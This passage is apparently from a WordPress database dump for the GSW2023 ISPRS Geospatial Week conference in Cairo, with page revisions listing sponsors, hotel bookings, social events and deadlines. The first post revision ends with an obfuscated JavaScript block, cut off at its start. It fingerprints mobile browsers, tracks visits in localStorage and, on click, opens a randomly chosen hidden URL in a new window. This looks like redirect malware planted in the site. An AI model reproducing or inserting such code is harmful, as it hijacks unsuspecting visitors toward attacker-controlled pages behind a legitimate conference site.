wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:59:21','2023-07-10 00:59:21','',3066,'https://gsw2023.com/?p=4991',0,'revision','',0),
(4992,1,'2023-07-10 01:04:35','2023-07-10 01:04:35','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688950756889{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-4990\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951071890{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 